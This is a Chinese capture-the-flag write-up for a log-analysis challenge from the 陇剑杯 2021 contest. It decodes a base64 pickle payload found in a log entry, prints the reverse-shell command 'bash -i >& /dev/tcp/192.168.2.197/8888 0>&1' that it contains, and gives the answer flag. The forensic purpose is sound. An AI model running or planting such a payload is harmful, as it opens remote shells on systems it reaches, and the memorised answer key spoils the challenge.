[陇剑杯 2021]简单日志分析(问3)

圆肖2025-10-02 13:31

1. 提取最后一条 base64

最后一条日志的 user 参数值为:

text

复制代码 
STAKcDAKMFMnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4=

2. Base64 解码

python

复制代码 
import base64

payload = "STAKcDAKMFMnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4="
decoded = base64.b64decode(payload)
print(decoded)

输出:

text

复制代码 
b'I\x0c0\x0c0S\'bash -i >& /dev/tcp/192.168.2.197/8888 0>&1\'\nw1\n0(g0\nlp2\n0(I0\ntp3\n0(g3\nI0\ndp4\n0cos\nsystem\np5\n0g5\n(g1\ntR.'

可以看到里面明明白白地出现了:

text

复制代码 
bash -i >& /dev/tcp/192.168.2.197/8888 0>&1

3. 结论

反弹 shell 的目标 IP 和端口是:

text

复制代码 
192.168.2.197:8888

最终答案:

text

复制代码 
192.168.2.197:8888
NSSCTF{192.168.2.197:8888}
相关推荐
望获linux7 分钟前
【Linux基础知识系列:第一百五十九篇】磁盘健康监测:smartctl
linux·前端·数据库·chrome·python·操作系统·软件
CoderJia程序员甲1 小时前
GitHub 热榜项目 - 日榜(2025-10-23)
ai·开源·大模型·github·ai教程
十一吖i1 小时前
vue3表格显示隐藏列全屏拖动功能
前端·javascript·vue.js
冰暮流星3 小时前
css之线性渐变
前端·css
徐同保3 小时前
tailwindcss暗色主题切换
开发语言·前端·javascript
mapbar_front3 小时前
大厂精英为何在中小公司水土不服?
前端
生莫甲鲁浪戴3 小时前
Android Studio新手开发第二十七天
前端·javascript·android studio
2501_916008895 小时前
Web 前端开发常用工具推荐与团队实践分享
android·前端·ios·小程序·uni-app·iphone·webview
Metaphor6926 小时前
Java 操作 PDF 图像:轻松驾驭 PDF 文档中的图片
经验分享
SkylerHu6 小时前
前端代码规范:husky+ lint-staged+pre-commit
前端·代码规范
热门推荐
01BongoCat - 跨平台键盘猫动画工具02GitHub 镜像站点03UV安装并设置国内源04GitLab 零基础入门指南:从安装到项目管理全流程05Linux下V2Ray安装配置指南06NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南07jdk21下载、安装(Windows、Linux、macOS)08Labelme从安装到标注:零基础完整指南092025软件测试面试八股文(含答案+文档)10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)